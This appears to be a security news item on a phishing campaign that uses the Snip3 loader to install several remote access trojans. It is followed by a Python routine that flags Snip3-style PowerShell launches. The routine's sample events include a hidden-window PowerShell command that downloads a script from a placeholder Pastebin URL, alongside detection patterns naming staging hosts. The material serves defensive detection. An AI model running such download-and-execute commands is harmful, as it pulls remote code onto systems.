Snip3 loader is used to install Revenge RAT, AsyncRAT, Agent Tesla and NetWire RAT on compromised systems
Microsoft has warned of an ongoing phishing campaign targeting aerospace and tourism organizations. The attackers deliver several remote access Trojans by means of a new, stealthy malware downloader.
The phishing emails purport to come from legitimate organizations and are disguised as PDF documents with industry-relevant content. Links embedded in the messages download VBScript files that launch a PowerShell script, which in turn executes the final RAT payload using process hollowing.
Once installed, the malware can steal credentials, take screenshots, collect webcam, browser and clipboard data as well as system and network information, and exfiltrate the data over SMTP on port 587.
The loader, dubbed Snip3, is used to install Revenge RAT, AsyncRAT, Agent Tesla, and NetWire RAT payloads on compromised systems.
Snip3 can also identify sandbox and virtual environments, which helps it evade antivirus solutions. The downloader uses further techniques to avoid detection, including:
- executing PowerShell code with the RemoteSigned parameter;
- using Pastebin and top4top;
- compiling RunPE loaders on the endpoint at run time.
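As an added example (not code from Microsoft or from the article), the small Python triage routine below scores process-creation events against the VBScript-to-PowerShell chain described earlier and the RemoteSigned and Pastebin/top4top markers listed above. The log events are constructed, the Sysmon-style field names and the `-ExecutionPolicy RemoteSigned` spelling are assumptions, and the Pastebin URL is a placeholder.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 fields, simplified); not real telemetry.
SAMPLE_EVENTS = [
    {   # mirrors the article's chain: script host launching PowerShell with RemoteSigned and a Pastebin stager
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -ExecutionPolicy RemoteSigned -w hidden -c "
                       "\"$s=(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/PLACEHOLDER')\"",
    },
    {   # benign admin task: PowerShell started from the desktop shell, no suspicious flags
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -File C:\Scripts\nightly-backup.ps1",
    },
    {   # script host plus RemoteSigned, but no staging URL on the command line
        "ParentImage": r"C:\Windows\System32\cscript.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -ep RemoteSigned -File C:\Users\Public\update.ps1",
    },
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}      # Windows Script Host binaries that run VBScript
STAGING_HOSTS = ("pastebin.com", "top4top")         # hosting services named in the article

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def snip3_indicators(event):
    """Return the Snip3-style indicators present in one process-creation event."""
    reasons = []
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    cmd = event["CommandLine"]
    if image in {"powershell.exe", "pwsh.exe"} and parent in SCRIPT_HOSTS:
        reasons.append("PowerShell spawned by a script host (VBScript -> PowerShell chain)")
    # The policy flag may be abbreviated (-ep, -ex...), so match only the policy value itself.
    if re.search(r"\bremotesigned\b", cmd, re.IGNORECASE):
        reasons.append("RemoteSigned execution policy passed on the command line")
    if any(host in cmd.lower() for host in STAGING_HOSTS):
        reasons.append("command line references a paste/file-hosting site used for staging")
    return reasons

def triage(events, min_indicators=2):
    """Return (index, reasons) for events with at least min_indicators hits; a single hit is too noisy alone."""
    hits = []
    for i, event in enumerate(events):
        reasons = snip3_indicators(event)
        if len(reasons) >= min_indicators:
            hits.append((i, reasons))
    return hits

if __name__ == "__main__":
    for i, reasons in triage(SAMPLE_EVENTS):
        print(f"event {i}: {SAMPLE_EVENTS[i]['CommandLine'][:60]}...")
        for reason in reasons:
            print("   -", reason)
```

Raising `min_indicators` to 3 keeps only the full chain; the threshold is the knob for tuning against an environment's legitimate script-host usage.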
Indicators of compromise related to the current campaign, including hashes of malware samples and domains of C&C RAT servers, can be found here.